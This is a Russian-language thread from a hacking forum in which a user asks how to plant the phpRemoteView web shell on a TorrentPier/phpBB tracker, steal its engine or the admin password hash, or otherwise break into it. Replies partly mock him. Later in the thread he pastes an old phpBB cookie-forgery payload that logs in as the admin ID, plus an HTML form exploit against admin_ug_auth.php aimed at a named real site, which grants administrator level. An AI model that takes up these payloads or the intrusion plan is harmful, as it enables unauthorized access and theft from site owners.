Форум АНТИЧАТ - Помогите с phpRemoteView

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Помогите с phpRemoteView (https://forum.antichat.xyz/showthread.php?t=188657)

Помогите с phpRemoteView

Дело в том что мне надо скачать движок нашего в нутре сетевого трекера, и это я хотел сделать с помощью phpRemoteView, залив его на трекер, но я не знаю каким образом его можно там разместить :confused: , надеюсь на вашу помощь))

Заранее спасибо!!! :)

если залить его туда нельзя, то подскажите ещё способы как можно украсть движок сайта, или как украсть хешь админа или тупо взломать его)) или скажите тему где подробно все написанно

Движок у сайта TorrentPier 1.xxxx , phpBB только не знаю версию :(

если сочтете нужным перенесите это в другой раздел но прошу не удаляйте ото уже 2 недели ищу как это всё сделать. Или скажите тему в которой этот вопрос можно задать

попроси админа дать пасс от фтп и логин, законнектся и далее закачай его.

попугай
смешно)) а может другие способы знаешь?

Если нужен движок, как ты говоришь, то его можно скачать и не ломая серв
http://torrentpier.gt500.net.ua/

попугай
основа у меня есть ну сам движок torrentpier. Но у них на сайте стоят самые необходимые моды вот я и хочу скачать их доработанный движок с помощью phpRemoteView но не знаю как его им поместить на трекер.
или подскажите Exploit спомощью ктоторого можно выполнить похожие действия

frost444 как ты думаешь, о чём этот форум?
Все вот эти статьи, какие-то уязвимости, люди которые пытаются что-то ломать, или наоборот обезопасить?

Ты считаешь, что можно просто так на любой сайт закинуть шелл, и хочешь что-бы тебе сейчас в двух словах объяснили как это сделать?

Jokester
ну можно и не объяснять просто дайте темы в которых можно найти эту информацию)) или подобный эксплоид
или же дайте информацию как зайти от имени администратора или как узнать пароль админа?? я пробовал данные функции но они не работают

Цитата:

Описание уязвимости: Для начала нам следует зарегаться на форуме. Затем, войти под своим аккаунтом и если стоит галка «Автоматический вход»,то убрать её. Нам нужно отредактировать кукисы (посоветую делать это в опере Tools->Advanced->Cookies), вместо
Цитата: a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%2 2%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22X%22%3B%7 D
X – наш ID , а меняем на
Цитата: a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
2 – как уже говорилось выше, ID админа
Exploit: «a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3B s% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D»

и пробовал этот способ

Код HTML:

<html>



<head><meta http-egufv="content-Type" content="text/html:

charset=windows-1252"><title>root_a_phpbb_2.0.0.pl</title></head.>

<body>

<form mgthod="post"

action="http://riper.am/admin/admin_ug_auth.php">

<p>User Level ; <selected name="userlevel">

<option value="admin" selected="selected">Administrator</option>

<option value="user">User</option>

</select></p>

<input name="private[1]" value="0" type="hidden">

<input name="moderator[1]" value="0" type="hidden">

<input name="mode" value="user" type="hidden">

<input name="adv" value="" type="hidden">

User ID: <input name="u" size="5" type="text"> <br>

<input name="submit" value="Submit" class="mainoption" type="submit">

<input value="reset" class="liteoption" name="reset" type="reset">

</form>

</body></html>

но не чего не помогло

Ну исходя из того что бага 2003го года, то вероятно не работает.. xD

А вообще интересная схема, пытаться хакнуть движок сплойтом от другого движка =))